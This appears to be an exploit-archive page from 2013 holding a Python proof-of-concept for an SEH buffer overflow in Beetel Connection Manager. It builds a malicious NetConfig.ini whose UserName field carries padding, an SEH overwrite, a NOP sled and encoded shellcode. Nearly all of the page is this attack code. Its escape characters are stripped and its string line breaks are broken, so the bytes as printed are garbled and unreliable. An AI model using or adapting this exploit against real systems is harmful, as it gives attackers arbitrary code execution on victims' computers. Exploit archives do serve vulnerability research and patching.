Home / exploits

PDF

Beetel Connection Manager SEH Buffer Overflow *youtube

Posted on 15 October 2013

#!/usr/bin/python
from struct import pack
#Exploit Title:Beetel Connection Manager SEH Buffer Overflow 
#Software for usb wireless
#Homepage:http://www.beetel.in/business-solutions/international-business/3g-products/g31-3g-data-card
#Version:PCW_BTLINDV1.0.0B04
#Software Link:http://www.mediafire.com/download/wdp05zlhzk0kgx4/Beetel+Connection+Manager_PCW_BTLINDV1.0.0B04.rar
#Poc video: http://www.youtube.com/watch?v=nrQb0pVwi8U&feature=youtu.be
#Found:    12.10.2013 
#Published:12.10.2013
#Exploit Author: metacom
#Tested on: Windows XP sp3 En
#RST
file="NetConfig.ini"
buffer="x41" * 453
jump="xebx4axffxff"
seh=pack('<I',0x0105E2F6)
nops="x90" * 80
shell=("xbax50x3exf5xa5xdaxd7xd9x74x24xf4x5bx31xc9xb1"
"x33x83xc3x04x31x53x0ex03x03x30x17x50x5fxa4x5e"
"x9bx9fx35x01x15x7ax04x13x41x0fx35xa3x01x5dxb6"
"x48x47x75x4dx3cx40x7axe6x8bxb6xb5xf7x3dx77x19"
"x3bx5fx0bx63x68xbfx32xacx7dxbex73xd0x8ex92x2c"
"x9fx3dx03x58xddxfdx22x8ex6axbdx5cxabxacx4axd7"
"xb2xfcxe3x6cxfcxe4x88x2bxddx15x5cx28x21x5cxe9"
"x9bxd1x5fx3bxd2x1ax6ex03xb9x24x5fx8exc3x61x67"
"x71xb6x99x94x0cxc1x59xe7xcax44x7cx4fx98xffxa4"
"x6ex4dx99x2fx7cx3axedx68x60xbdx22x03x9cx36xc5"
"xc4x15x0cxe2xc0x7exd6x8bx51xdaxb9xb4x82x82x66"
"x11xc8x20x72x23x93x2ex85xa1xa9x17x85xb9xb1x37"
"xeex88x3axd8x69x15xe9x9dx86x5fxb0xb7x0ex06x20"
"x8ax52xb9x9exc8x6ax3ax2bxb0x88x22x5exb5xd5xe4"
"xb2xc7x46x81xb4x74x66x80xd6x1bxf4x48x37xbex7c"
"xeax47")
header="x68x74x74x70x3ax2fx2fx41x41x41x41x41x41x41x41"
xploit=header + buffer + jump + seh + nops + shell
eip="[SEH Buffer Overflow]
"
eip+= "Name=Edit Me" + "
"
eip+= "UserName=" + xploit + "
"
eip+= "UserPass=" +"
"
eip+= "DialNum=" + "
"    
eip+= "IsAutoGetAPN=1" + "
"
eip+= "APN=" + "
"           
eip+= "IsAutoGetDNS=1" + "
"
eip+= "MainDNSaddr=" + "
"
eip+= "AltDNSAddr=" + "
"
eip+= "IsAutoGetPDP=1" + "
"
eip+= "pdpAddr=" + "
"
eip+= "pdpType=IP" + "
"
eip+= "AuthType=PAP" + "
"
eip+= "askUserAndPass=0" + "
"
eip+= "SaveuserAndPass=0" + "
"
eip+= "IsDfault=0" + "
"         
eip+= "DeniEditDelete=0"   + "
"         
try:
    print "[*] Creating exploit file...
"
    writeFile = open (file, "w")
    writeFile.write( eip )
    writeFile.close()
    print "[*] File successfully created!"
except:
    print "[!] Error while creating file!"

 

TOP